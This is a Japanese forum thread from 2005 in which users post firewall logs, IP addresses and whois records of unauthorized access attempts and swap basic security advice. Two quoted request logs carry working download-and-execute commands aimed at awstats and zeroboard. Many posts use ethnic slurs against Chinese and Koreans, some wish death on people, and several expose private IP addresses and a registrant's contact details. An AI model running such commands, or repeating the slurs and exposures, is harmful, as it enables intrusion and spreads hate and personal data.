| `".`´ ノ\ `ヽニニノ丿 \
人 入_ノ \___/ /`丶´
/ \_/ \ /~ト、 / l \
/ \/l::::|ハ/ l-7 _ヽ
/i ⊂ニ''ー-ゝ_`ヽ、 |_厂 _゙:i
/| >‐- ̄` \. | .r'´ ヽ
/ | 丁二_ 7\、|イ _/ ̄ \
581 :
名無しさん@お腹いっぱい。 :2005/08/13(土) 14:06:08
2chのある板でカキコするとその後必ず不正アクセスが1回あって
ウイルスが送られてくるのですが、こんな事ってあるのでしょうか?
ある板↓
「
http://money4.2ch.net/pachi/ 」
ウィルスの送信元↓
前回は「220.77.196.59」
ウイルスは
「トロイの木馬」
です。
これって、2chがウィルスばら撒いてるって事だよね。
ウイルスがどういう手段で送られてくるの?
>>582 普通にネットをしていると、セキュティソフトのポップアップ警告がでます。
そのログより、「侵入検知が・・・トロイの木馬を検出して遮断しました・・」
そのあとに攻撃元のipが表示されてます。アドレスは毎回違うようです。
郵送で送ってきました><
ネットワークウイルスってやつ?? 詳しくはしらないけど
ルータからのアクセスしかないwww
127.0.0.1
とかまだ言ってる。笑わせてもらうわ。
>>581 も笑わせもらう。
ソースとディスティネーションの区別すら付かんのか・・・
わらた
たわら
IPアドレス 61.44.22.29 ホスト名 29.22.44.61.ap.yournet.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 福井県 市外局番 -- 接続回線 種別不明 はるばるポートスキャンなにか用かね?
某所からコピペ ------------------------------------------------------------------- こないだ学校から寒国の国防省なんたら研究所とかゆう奴に田代砲かましたら、 P i n g と ポ ー ト ス キ ャ ン か け て き や が っ た 仮にも国の役所がそんな犯罪行為するなんて信じられるか? さすがわ呪われた半島クォリティw よく知らないけどこれって法的には宣戦布告に相当するよね。 どこに訴えたらいいと思う? 米軍がソウルとか空爆したら祭りだよね? その時はぜったい折れのことおもいだしてくれ。
>>594 じゃあ実験してみたいけどけどURLがわからんな
中国の馬鹿どもがポートスキャンしまくり。 何がおもしろいんだろうね。
597 :
名無しさん@お腹いっぱい。 :2005/08/14(日) 12:18:05
1433とか必死に嗅ぎまわってるし、中共ワロスwwww
598 :
名無しさん@お腹いっぱい。 :2005/08/14(日) 12:35:29
219.154.195.117 SMURF 219.154.195.117 TCP SYN FLOOD 明日に備えてシナがうごめき始めたぞ。
p5024-adsao01daikai-acca.hyogo.ocn.ne.jp
inetnum: 61.78.0.0 - 61.85.255.255
netname: KORNET
descr: KOREA TELECOM
descr: KOREA TELECOM Internet Operating Center
country: KR
admin-c: DL276-AP
tech-c: WK81-AP
remarks: ***********************************************
remarks: KRNIC of NIDA is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the NIDA Whois DB
remarks:
http://whois.nida.or.kr/english/index.html remarks: ***********************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed:
[email protected] 20010511
changed:
[email protected] 20010627
status: ALLOCATED PORTABLE
changed:
[email protected] 20041007
source: APNIC
% APNIC database, last updated 20050813 23:00:33
チョソウザー
うちにも来てる ワクワク
219.154.195.117
% [whois.apnic.net node-2]
% Whois data copyright terms
http://www.apnic.net/db/dbcopyright.html inetnum: 219.154.0.0 - 219.157.255.255
role: CNCGroup Hostmaster
e-mail:
[email protected] address: No.156,Fu-Xing-Men-Nei Street,
address: Beijing,100031,P.R.China
nic-hdl: CH455-AP
phone: +86-10-82993155
fax-no: +86-10-82993102
country: CN
admin-c: CH444-AP
tech-c: CH444-AP
changed:
[email protected] 20041119
mnt-by: MAINT-CNCGROUP
source: APNIC
person: Liping Zhong
address: Henan Multimedia Information Bureau
address: 70, Nong Ye Road
address: ZhengZhou, Henan 450002
address: CN
country: CN
phone: +86-371-3962276
fax-no: +86-371-3962068
e-mail:
[email protected] nic-hdl: LZ33-AP
mnt-by: MAINT-NULL
changed:
[email protected] 20001124
source: APNIC
602 :
名無しさん@お腹いっぱい。 :2005/08/14(日) 19:50:22
>>600 ニダーがアドレスの管理してるのか。
remarks: ***********************************************
remarks: KRNIC of NIDA is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the NIDA Whois DB
remarks:
http://whois.nida.or.kr/english/index.html remarks: ***********************************************
219.154.195.117 これ、拠点か? そこらじゅうにばらまいてるな。
うちもかなりシナと半島からかなりきてるな。 上海とか、上海の少し南の寧波 (NINGBO)とか。 ソウルからもちゃんときてる。 UDPとかSMTPとか悪意ありまくり。
605 :
604 :2005/08/16(火) 01:40:38
そうそう、旧満州のハルビン近くからも来てる。 あとは、GUANGZHOU (廣州)?香港に近いところだな。 まあ、大陸各地からいっぱいきてる。
UDP1026-1027 WindowsMessenger SPAM 2005/08/16 10:10:30 218.92.11.45 /CHINANET-JS 2005/08/16 10:02:57 222.136.188.49 /CNCGROUP-HA 2005/08/16 09:59:40 218.92.13.147 /CHINANET-JS 2005/08/16 09:52:40 222.189.38.2 /CHINANET-JS 2005/08/16 09:36:14 218.92.13.147 /CHINANET-JS 2005/08/16 09:31:40 222.141.102.13 /CNCGROUP-HA 2005/08/16 09:31:14 218.92.11.35 /CHINANET-JS 2005/08/16 09:28:47 222.189.38.30 /CHINANET-JS 2005/08/16 09:27:01 61.152.158.125 /SHANGHAI-GLOBAL-NET 2005/08/16 09:20:53 218.92.11.43 /CHINANET-JS 2005/08/16 09:20:12 218.92.11.40 /CHINANET-JS 2005/08/16 09:17:06 218.66.104.152 CHINANET-FJ 2005/08/16 09:15:03 218.92.11.38 /CHINANET-JS 2005/08/16 09:13:20 218.92.11.42 /CHINANET-JS 2005/08/16 09:11:55 218.66.104.139 /CHINANET-FJ 2005/08/16 09:10:54 218.92.11.39 /CHINANET-JS 2005/08/16 09:00:24 218.92.11.41 /CHINANET-JS 2005/08/16 08:48:37 218.92.11.43 /CHINANET-JS 2005/08/16 08:47:22 218.93.201.38 /CHINANET-JS 2005/08/16 08:47:09 222.189.38.22 /CHINANET-JS
ある意味、共産主義でハッカーっていうのはカッコ悪いの代名詞みたいなもんなんだよね。 あー、中共カッコ悪〜
IPアドレス 222.159.58.96 ホスト名 nttksm017096.tksm.nt.ftth.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 徳島県 市外局番 -- 接続回線 光 何度もシンフラッドして来やがって 泡踊りでも踊ってろゴミクズ
IPアドレス 201.255.6.224 ホスト名 201-255-6-224.mrse.com.ar IPアドレス 割当国 ※ アルゼンチン (AR) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし IPアドレス 193.165.199.218 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ チェコ (CZ) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
8月15日の終戦記念日から2日ぐらい、 IPアドレス 61.53.57.16 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし こいつが鬼のようにポートスキャンしてきてたんですが。
>>610 だけど、靖国神社のサイトにアクセスした後ぐらいに
(15日と16日)やられてる気がするんだけど、気のせいだよな
2005/08/17(21:23:47) W-SV 210-194-192-183.rev.home.ne.jp(210.194.192.183) [80] 302 29 "HEAD / HTTP/1.0" ( dummy )
inetnum: 221.137.0.0 - 221.137.255.255
netname: COLNET
country: CN
descr: Cable OnLine Network
descr: 9/F, Broadcasting&TV Building,
descr: No.651 Nanjing Rd.(W)
descr: Shanghai, 200041
admin-c: ZS58-AP
tech-c: HH274-AP
status: ALLOCATED PORTABLE
changed:
[email protected] 20030815
mnt-by: MAINT-CNNIC-AP
source: APNIC
% APNIC database, last updated 20050818 23:00:33
チャンコロ氏ね
中国と韓国からのポートスキャンが凄い ルータ買うか・・・
ルータは買うだけじゃダメだぞ。 ちゃんと接続して使うんだぞ。
IPアドレス 216.35.71.116 ホスト名 demo.linksynergy.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし シンフラッドはもういいよ
IPアドレス 210.79.7.242 ホスト名 pip16.gyao.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし 有線め
こんなんですが、対処法はないですか? Sat, 2005-08-20 22:07:06 - Source:61.152.91.225,80,WAN - Destination:...,17357,LAN Sat, 2005-08-20 22:11:51 - Source:61.152.91.225,80,WAN - Destination:...,17757,LAN Sat, 2005-08-20 22:19:23 - Source:61.152.91.225,80,WAN - Destination:...,14157,LAN Sat, 2005-08-20 22:19:45 - Source:61.152.91.225,80,WAN - Destination:...,13357,LAN Sat, 2005-08-20 22:19:50 - Source:61.152.91.225,80,WAN - Destination:...,18157,LAN Sat, 2005-08-20 22:29:28 - Source:61.152.91.225,80,WAN - Destination:...,23757,LAN Sat, 2005-08-20 22:38:23 - Source:61.152.91.225,80,WAN - Destination:...,15757,LAN Sat, 2005-08-20 22:47:57 - Source:61.152.91.225,80,WAN - Destination:...,21357,LAN Sat, 2005-08-20 22:57:16 - Source:61.152.91.225,80,WAN - Destination:...,13757,LAN Sat, 2005-08-20 23:00:50 - Source:61.152.91.225,80,WAN - Destination:...,12957,LAN Sat, 2005-08-20 23:20:25 - Source:61.152.91.225,80,WAN - Destination:...,26957,LAN Sat, 2005-08-20 23:25:27 - Source:61.152.91.225,80,WAN - Destination:...,22957,LAN Sat, 2005-08-20 23:26:30 - Source:61.152.91.225,80,WAN - Destination:...,20557,LAN Sat, 2005-08-20 23:32:09 - Source:61.152.91.225,80,WAN - Destination:...,10157,LAN Sat, 2005-08-20 23:42:04 - Source:61.152.91.225,80,WAN - Destination:...,16157,LAN
620 :
618 :2005/08/21(日) 19:48:45
>>619 LANケーブルで首釣ろうとしたら止まりました。
IPアドレス 12.158.80.10 ホスト名 crl.verisign.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし シンフラッド ベリサインは少しは対策しる
いや確かにシンフラッドには変わりは無い けどね
country: AU
不正アタックされたIP一覧 "ファイアウォール","06:43:56","TCP","192.168.11.1","1054","192.168.11.3","2869","C:\WINDOWS\SYSTEM32\SVCHOST.EXE","Generic Host Process for Win32 Services","セキュリティレベル設定によるブロック" "ファイアウォール","06:43:58","TCP","192.168.11.1","1054","192.168.11.3","2869","C:\WINDOWS\SYSTEM32\SVCHOST.EXE","Generic Host Process for Win32 Services","セキュリティレベル設定によるブロック" "ファイアウォール","06:44:15","ICMP","192.168.11.2","N/A","192.168.11.3","N/A","---","---","Echo Request" "ファイアウォール","06:44:17","ICMP","192.168.11.2","N/A","192.168.11.3","N/A","---","---","Echo Request"
IPアドレス 61.46.8.121 ホスト名 zaq3d2e0879.zaq.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 大阪府 市外局番 -- 接続回線 CATV 2時間で256回の不正アクセス勘弁してくれ!
この1週間こいつが日に20回位アクセスしてくる IPアドレス 211.128.191.77 ホスト名 ntszok075077.szok.nt.adsl.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 静岡県 市外局番 -- 接続回線 xDSL
なんで氏那人ってこんなにキチガイなの?
アタックしてるシナやチョソもいるだろうけど セキュリティが甘すぎて踏み台にされまくってるんだろう ほとんど割れWinらしいしどっちにしろ莫迦なのは変わらんがw
ICMPってよくわかんないんだけど これってアメリカとかカナダとかから来てたらおかしいよね?
全然おかしくない
633 :
名無しさん@お腹いっぱい。 :2005/08/24(水) 13:25:07
fl220-100-193-005.i-chubu.ne.jp
634 :
名無しさん@お腹いっぱい。 :2005/08/25(木) 14:42:57
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 220.105.0.0/16 b. [ネットワーク名] OCN f. [組織名] オープンコンピュータネットワーク g. [Organization] Open Computer Network m. [管理者連絡窓口] AY1361JP n. [技術連絡担当者] MO081JP n. [技術連絡担当者] KK551JP n. [技術連絡担当者] IM657JP p. [ネームサーバ] ns-kg001.ocn.ad.jp p. [ネームサーバ] ns-kn001.ocn.ad.jp 08/25/2005 12:06:29.256 - Ping of death dropped - Source:220.105.4.159, 8 08/25/2005 12:24:59.096 - Ping of death dropped - Source:220.105.4.159, 8 08/25/2005 12:43:41.544 - Ping of death dropped - Source:220.105.4.159, 8 08/25/2005 13:01:58.864 - Ping of death dropped - Source:220.105.4.159, 8 08/25/2005 13:20:07.560 - Ping of death dropped - Source:220.105.4.159, 8 08/25/2005 13:38:28.928 - Ping of death dropped - Source:220.105.4.159, 8 08/25/2005 13:56:55.800 - Ping of death dropped - Source:220.105.4.159, 8 08/25/2005 14:15:20.560 - Ping of death dropped - Source:220.105.4.159, 8 非常に悪質な攻撃なんでプロバにメール打っておいた。
635 :
名無しさん@お腹いっぱい。 :2005/08/25(木) 16:59:04
61.152.93.83 から今までで7117回も不正アクセスが 多分中国かな いいかげんにしる
636 :
名無しさん@お腹いっぱい。 :2005/08/25(木) 20:36:07
60.35.204.147 こいつも
Aug 25 23:25:12 trap sshd[5230]: refused connect from jupiter.eee.u-ryukyu.ac.jp Aug 25 23:36:33 trap sshd[4900]: refused connect from jupiter.eee.u-ryukyu.ac.jp ほぅ
どなたかこのIP調べてくれませんか? 221.25.66.184 YahooBB221025066184.bbtec.net Mozilla/4.0 (compatible:MSIE5.01;Windows98)
>>638 自分でやれ。どんなことされたかも書かずにそんなこと依頼するな。
640 :
名無しさん@お腹いっぱい。 :2005/08/26(金) 12:59:46
携帯からなので調べられないんです…そのIPの人にサイトをめちゃくちゃに荒されてるので携帯からではどうにもならないですか?
>>640 そこまでわかってるのならヤフーBBのサポートに言えば?
何で携帯からなのにIPわかんだ ワラタ
サイトの管理人なので書き込みログを見ればIPとかは全てわかるのですがそれ止まりで…個人で調べるのは無理ですか?
IP調べて言葉も通じないような外国のプロバイダーのアドレスだったらともかく ヤフーBBのアドレスならヤフーBBサポートセンターに問い合わせればいいだけだろ。 それとも日本語に不自由してる外国の方なんですか?
646 :
名無しさん@お腹いっぱい。 :2005/08/26(金) 17:44:16
PPPax453.aichi-ip.dti.ne.jp 61.195.23.203
まあ普通は相手にされない。 root権限持った人なら多少違う。 俺の経験では、地域限定みたいなところならユーザーに警告で終了。 それでも規模の大きいプロバイダはまず無理だね。
ヤフーBBだからアテにしてなかったけどウィルスメールを送りつけてくるのが いつも決まったIPアドレスだったのでサポートに通報して対応を要求したら ちゃんと対応してくれたよ。 まあ、ケースバイケースだとは思う。
いまだに135とか445でsniffしてくるPC使ってるやつがいるんだな。 意外と日本国内ってウイルス対策してない奴が多すぎるんじゃないか?
つーか初心者を撲滅するしかないね。 全部パソコンのことがわかるレベルまで上げなきゃダメだ。
中国から1時間に1人は来る。 221.239.217.215 218.22.210.27 222.90.73.46 218.65.230.19 221.239.206.137 221.239.202.39 テラキモス('A`)
KRよりスクリプトによるsshへの猛烈なアタックあり 最初はルータが壊れたかと思いました。 とりあえずフィルタに追加しときました。 ザマミロ
マナーがないアクセスなので不正アクセスと認識した。↓ 220.211.101.120(pd36578.ngyaac00.ap.so-net.ne.jp)
IPアドレス 61.152.91.249 IPアドレス 割当国 ※ 中国 (CN)
655 :
名無しさん@お腹いっぱい。 :2005/08/28(日) 00:33:12
中国共産党うぜぇぇぇぇぇぇぇぇえええええええええええ!!!!!!!!!!!!!!111
全体のうちの9割が中国です
657 :
名無しさん@お腹いっぱい。 :2005/08/28(日) 21:21:47
中国共産党の官製ハッカーですね。 あの国、逝かれとるな。
659 :
名無しさん@お腹いっぱい。 :2005/08/29(月) 05:53:46
時刻は伏せるがhttpdのログにこんなのが10回弱。
219.166.34.48 - - [28/Aug/2005:**:**:** +0900] "GET //awstats.pl?configdir=|echo
%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/arena1
23/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 213 "-" "Moz
illa/4.0 (compatible; MSIE 6.0; Windows 98)"
正体は在日中国人。
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=219.166.34.48 判断は各々に任せる。
>>659 探してるだけ。どこでもあるlogなので普通。
661 :
名無しさん@お腹いっぱい。 :2005/08/29(月) 13:19:05
220.139.49.10 ホスト名 220-139-49-10.dynamic.hinet.net IPアドレス 割当国 ※ 台湾 (TW)
執拗なポートスキャンが氏那人 諦めの早いトロイの木馬が朝鮮人
( ´_ゝ`)・・・攻撃してきたら攻撃そのまま跳ね返して自分のPCをハッキングするとかいうツールあったらいいと思うんだが
>>664 ウイルスの場合がほとんどだから、攻撃というより、勝手にウイルス除去しないとだめかも。
>>665 コードレッドの時のコードブルーみたいになって終わる罠。
brutesshアタック 221x254x225x147.ap221.ftth.ucom.ne.jp 夏休み中でいくつかの板に人大杉制限が掛けられてたみたいで、 先週いっぱいアクセスできなかったよ。 うち、専用ブラウザうまく動かなくて普通のブラウザでみてるし。
70.187.67.194 ip70-187-67-194.cl.ri.cox.net ノートンのログに溜まってた 定期的にアクセスしてきてる マジで殺したい
Sokets de Trois v1での攻撃が激しくクルーン 勘弁してよ ストリーミングとか見てる時に来ると接続が切れる事もあったし
2005/08/31(06:41:45) W-SV 61.132.91.3 [80] 400 0 "GET http//www.sina.com.cn/ HTTP/1.1" ( dummy )
671 :
名無しさん@お腹いっぱい。 :2005/09/02(金) 02:51:12
カウンター喰らわせたい。 目には目を歯に歯を
672 :
名無しさん@お腹いっぱい。 :2005/09/02(金) 10:10:59
2005/09/01(23:32:04) W-SV ntt3-ppp136.gifu.sannet.ne.jp(211.133.182.136) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/09/02(00:50:44) W-SV ntt3-ppp136.gifu.sannet.ne.jp(211.133.182.136) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/09/02(05:44:02) W-SV ntt3-ppp136.gifu.sannet.ne.jp(211.133.182.136) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/09/02(06:24:41) W-SV ntt3-ppp136.gifu.sannet.ne.jp(211.133.182.136) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/09/02(09:47:43) W-SV ntt3-ppp136.gifu.sannet.ne.jp(211.133.182.136) [80] 302 29 "GET / HTTP/1.0" ( dummy ) うざいな、これはうざいな。連続したログがこれだった。
ntt3-ppp136.gifu.sannet.ne.jp(211.133.182.136)こいつうざすぎ。またきた。
>>659 なにこの在チュン
あいつらどこにいても変わらないな。
2005/09/02(14:17:00) W-SV 211.133.182.136 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.182.136 ]" 2005/09/02(14:44:47) W-SV 211.133.182.136 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.182.136 ]" アクセス拒否にしてもしつこくアクセスしに来た。
2005/09/02(15:50:23) W-SV 211.133.182.136 [80] E200034 "利用者リストでアクセスが拒否されました ( dummy ) [ 211.133.182.136 ]"
>>675 しょうがないよ。大抵の場合、手動でアクセスしてるわけじゃなくて、
ワームやウイルスに汚染されて勝手にあちこちアタックかけにいくから。
うちには dai2koujou.st.wakwak.ne.jp からSSHスキャン。
ここはサーバっぽいけど、たぶんクラックされてるんだろうね。
連絡してあげようと思ったけど、連絡先が書いてなくてダメ。
2005/09/02(16:50:07) 2005/09/02(16:53:21) 2005/09/02(18:09:34) 2005/09/02(18:18:10)
>>677 わかってるけどこいつは異常すぎる。
同じ箇所に何度もアクセスするなんて。
679 :
名無しさん@お腹いっぱい。 :2005/09/02(金) 22:29:24
セキュリティにZoneAlarmを使用しています。 フレッツモアに最近変えて、モデムも変えました。 ZoneAlarmのログに10秒置きに、同じIPで該当があるのです。 Packet sent from 192.168.116.2(UDP Port 1365)to 192.168.116.1 (DNS) blocked ドメインサーチで探しても該当がありません。 モデムは必要ないときには電源を切っていますが、 つなげるたびにまた同じIPから繰り返しあります。 これは何なのでしょうか?不正アクセスにしては毎回同じなのも・・・。
681 :
名無しさん@お腹いっぱい。 :2005/09/02(金) 23:27:07
>>680 何故ですか?
初心者なので意味がわかりませぬ。
初心者はローカルアドレス知らないからねえ・・・・・・・
683 :
名無しさん@お腹いっぱい。 :2005/09/02(金) 23:45:42
>>682 ローカルアドレスですか、知りませんでした。
教えてくださってありがとうございます。
ローカルアドレスについての知識がないので調べて勉強してみます。
684 :
名無しさん@お腹いっぱい。 :2005/09/03(土) 00:05:46
202.103.178.149 IPアドレス 202.103.178.149 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし アクセスポート 1026 〜 たくさん これドウイウコト?
>>684 確かにウザイが弾いてればもうまんたい
686 :
名無しさん@お腹いっぱい。 :2005/09/03(土) 00:17:41
そうですか、安心しました。
127.0.0.1 ローカルホスト(常に自分自身) 192.168.0.0-192.168.255.255 ローカルネットワーク(一般的にはこれを使うことが多い) 172.16.0.0-172.31.255.255 ローカルネットワーク 10.0.0.0-10.255.255.255 ローカルネットワーク ルータを使うのが当たり前の世界に早くなってほしいものです。 セキュリティに詳しくない人は(ルータが標準の)フレッツ光プレミアム(NTT西)を使いましょう。
Norton AntiVirus 2004っていうので自分のパソコンが不正アクセスられてるかとかわかりますか? みんな何のソフトで不正アクセスしてくる相手のIP調べてるんですか?
私はNorton AntiVirus 2005 のログ見てるだけ
発信元 192.168.0.1 ポート 1025からひとつづつ増やしていって1075までいって繰り返す 多いときで10秒おき なんでしょか
>>688 先生、東の人はどこにすればいいですか?
693 :
名無しさん@お腹いっぱい。 :2005/09/03(土) 11:42:11
>>682 自分でルータ買ってきましょう。
NTT東の方がスマートな気もする。融通がきくし。ひかり電話も使える。
696 :
名無しさん@お腹いっぱい。 :2005/09/03(土) 17:52:59
fl220-100-192-179.i-chubu.ne.jp
最近中国と南朝鮮からのアタックが酷いですが皆さんはどうですか? 何だか1ヶ月前ぐらいから急激に増えました。
>>697 種類(ポート)は?
閉めときゃえーと思うけんど。
>>697 同じ相手のPort80、6000、7000から、xxx71とかxxx65とか下2桁が同じで5分間隔にログがある。
それと、1026、1027udp
>>699 なんでそんなポート(80以外)開けてんの?
>>700 閉じてるからログが記録される方が一般的だバカ!
702 :
名無しさん@お腹いっぱい。 :2005/09/07(水) 23:03:11
IPアドレス 202.103.178.196
ホスト名 対応するホスト名がありません
IPアドレス
割当国 ※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
中国語にくわしい方いますか?
【8月25日下午3点】
服?器名:呱呱?代
固定IP:202.103.178.196
【 客服QQ 】:1671834
【 服?地址 】:广??信
【客服??】:13797917127
【版本?型】:超???GM版
【官方网站】:
Http://www.2w4f.com これなに? ゲーム?
自分で調べろよ
>>703 このサイト行って見たけど、なんかセンスの悪いCGのおねーちゃんがまん中
にデカデカと表示されていていっぱいIPがのっていたけど?
訳してもちゃんと訳出来ないのでだれかおしえてください m(_ _)m
なんじゃこりゃ。(リンクしないように : 抜きました&改行) 2005/09/08(12:54:27) W-SV 66.28.147.172 [80] 404 0 "GET /zeroboard/skin/zero_vote/error.php?dir=http//geocities.com/zamelmania/fbi.gif?&cmd=cd%20/tmp;wget%20 http//www.moamall.com/bbs/qmail.tgz;GET%20http//www.moamall.com/bbs/qmail.tgz%20>%20qmail.tgz;curl%20-O%20 http//www.moamall.com/bbs/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;pwd HTTP/1.1" ( dummy ) これが4回あった。初めて見たけど ま た 脆 弱 性 か
久しぶりにawstats.pl狙いのアクセスが来た。 apollo.firstserver.com(66.39.168.67)
yahoobb220039024230.bbtec.net
708 :
名無しさん@お腹いっぱい。 :2005/09/10(土) 00:56:31
最近、無線LANを始めました、 セキュリティーが気になることは気になるのですが、 たとえば、実際に、他人に便乗利用されることのほか どのような被害がありえるのでしょうか チンブクとかトロイを埋め込むなんてことが 本当に出来てしまうんでしょうか
127.0.0.1から何か来たんだけどやっぱトロイかなぁ。
金玉金玉ー
>>709 くだらんよ。少し前に 688 があって自明だし。
不正プログラムが鯖立てて、 その鯖に内部からアクセスしたら 127.0.0.1になるとか?
713 :
名無しさん@お腹いっぱい。 :2005/09/10(土) 10:23:46
IPアドレス 213.156.98.79 ホスト名 98-79.echostar.pl IPアドレス 割当国 ※ ポーランド (PL)
716 :
sage :2005/09/10(土) 22:40:50
>705 ウチニモ同じアクセスがあったよ。 moaの方はハングルいっぱい、zameの方はgeoアメリカの個人ページか なにかの入り口だたよ。イズレニシテモ迷惑な話だは・・・・・・・
(´-ω-`)無線LANで木馬検出中のマヌケな俺が来ましたよ PCスキャン中、携帯でパピコ
Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 220.99.128.0/17 b. [ネットワーク名] PLALA f. [組織名] 株式会社 ぷららネットワークス g. [Organization] Plala Networks Inc. m. [管理者連絡窓口] MN2905JP n. [技術連絡担当者] HS3694JP p. [ネームサーバ] dns1.plala.or.jp p. [ネームサーバ] dns2.plala.or.jp p. [ネームサーバ] ns-tk061.ocn.ad.jp
719 :
718 :2005/09/11(日) 11:47:11
↑ IPアドレス 220.99.158.58
720 :
名無しさん@そうだ選挙に行こう :2005/09/11(日) 12:36:39
何されたか言うと何か進展がありますか?
MSSQL StackOverflowの試み IPアドレス:12.219.249.10 ホスト名12-219-249-10.client.mc(←ここから先が見えない) IPアドレス 割当国 ※ アメリカ (US) Middletown.NY 同じアメリカ人が災害で苦しんでいるというのにこいつは・・・
>>721 IPだけ書いてあるとIP晒してるだけに見える。このスレは不正アクセスしてくるIPを晒すスレ
IP晒しだとしても何されたかテキトーに書けば同じだろ 意味なし
>>724 テキトーに書けとは言ってない。ちゃんと書け。
どんなアタックかわからなきゃ役に立たん。
だからなんの役に立つんだよ 反撃でもしてくれるのかね
アタック内容書くことが、不正アクセス晒しと単なるIP晒しを見分ける手段なの?
728 :
名無しさん@そうだ選挙に行こう :2005/09/11(日) 18:42:10
触られ方説明すると痴漢も冤罪も片っ端から捕まえちゃうアフォ警官?
>>722 だがコイツさっきからIP変えて5連続で仕掛けてきやがる。
粘着しすぎ。何がしたいんだ・・・・・・
>>722 なんでMSSQLへのアクセスをオープンにしとくのさ。
特定のIPアドレスからのみアクセスできるように絞っておけば、
そもそも接続自体をdeniedできるじゃんよ。
ということでどういうことをされたと書き込むとこのように反応があり、対処法などが聞ける場合がある。 だからIPだけ晒してるよりはどういうことをされたのか書くといいって言ってるわけ。
Dos Attack Bonk ってなに?
2005/09/11(23:36:29) W-SV 211.140.33.101 [80] 400 0 "GET http//www.sina.com.cn/ HTTP/1.1" ( dummy )
>>731 書かないヤツが情報を得られないだけなんだから
いちいち尋ね返すことないのでは?と言ってるのだが
新しいアタックの情報を知る場(の一つ)でもあるわけよ、ここは。
初心者質問いいっすか? 444番ポートって何に使ってるんですか? やたらとアクセス来るのでルータでフィルタリングしていいですか?
>>736 一般的には snpp (Simple Network Paging Protocol) だそうだけど、聞かないね。
閉めていいんじゃない。というか、基本はINは全部閉めて、使うポートだけを開けとくもんよ。
それと、LinuxやBSDなどでは /etc/services というファイルに
WELL KNOWN PORT NUMBERS が書いてあるよ。
WIndowsの場合も同様のファイルがあるのかな?
MacOS XはBSD系だから /etc/services にあるよ。
738 :
736 :2005/09/13(火) 14:57:35
>>737 なるほど。ありがとうございました。444番は閉じました。
ルータが何かあんまりいいルータでないので、全部閉じるのって
結構大変・・・
とりあえず444番閉じたらアクセス減りました。
>>738 >ルータが何かあんまりいいルータでないので、全部閉じるのって
>結構大変・・・
そなの? そういうときはついでにちょろっとルータ名書いとけばいいヒント得られるかもよ?
うちはYAMAHAのRT57i。自社サーバも立てとりますんで。
>>739 え?結構簡単なものなんですかね?
正直、使いこなしてない感が・・・(汗)
ルータはメルコのBLR2-TX4です。
最近、バックアップ用にメルコのBBR-4HGも買ってきました。
どっちもブラウザで設定しかやってないです・・・
>>741 なるほど、BBR-4HGのほうがいいですよね。
ネットワーク切替の際には細かく設定してみます。
今はサーバー立てて公開してるんだけど
前任者がつながること優先でポートがら空きにした模様・・・orz
(サーバーでは対策してるみたいだけど)
時間を見てルータの調整してみます。
ありがとうございました!
>>742 あらま、サーバー立ててらっしゃいましたか。なら慎重かつ十分な設定が必要ですね。
うちは設定のしやすさの観点から、
一度買ったルータ(BA8000Pro)を買い直した(RT57i)くらいですよ(その前にRTA54i使ってたから)。
不正アクセスに対しては各LinuxサーバーごとにLogwatchというツールでチェックしています。
744 :
名無しさん@お腹いっぱい。 :2005/09/14(水) 18:21:37
ntsitm206023.sitm.nt.ftth.ppp.infoweb.ne.jp .211.133.12.23
ウゼwwwwwwwwwwwwwwwwwwwwwwwwwww 206.223.154.245 tiger2513.maido3.com
一応ググっては見たんですが、どーも目的がわかりませんので ここへ書き込みさせて頂きます。 さんざん既出の報告でしたら、どちら様も失礼御免下さい。 Norton Internet Security Professional 2004 SouthKoreaの某新聞社 IP: 218.145.28.72:85 念のため、アクセス拒否設定にしときました。
初心者でごめん 不正アクセスのIPから串刺すことはできない?
不正アクセスしてきたIPを串として使うの?そのIPが串として利用可能ならできるんじゃないの? なんか言ってる意味がよくわからない。
Null Scan - Source:211.131.61.84,1308 ぬるぽキタ━━━━━━(゚∀゚)━━━━━━ !!!!!
751 :
ho? :2005/09/17(土) 07:18:23
>>749 「不正アクセスしてきた奴のIPアドレスをFWではじくようにしたら、今度はプロキシーを経由して別のIPアドレスから攻撃してくるんじゃないか?」
って質問かなあ??
そうだとすると攻撃の種類による。
場合によっては、そういう事が可能なプロキシーがありそう。
>>747 早速の御返事有り難く頂戴つかまつり候。
ルータとPC側FWにて既に遮断しました由、御報告申し上げ候。
i219-164-77-172.s01.a001.ap.plala.or.jp
754 :
747 :2005/09/18(日) 17:47:29
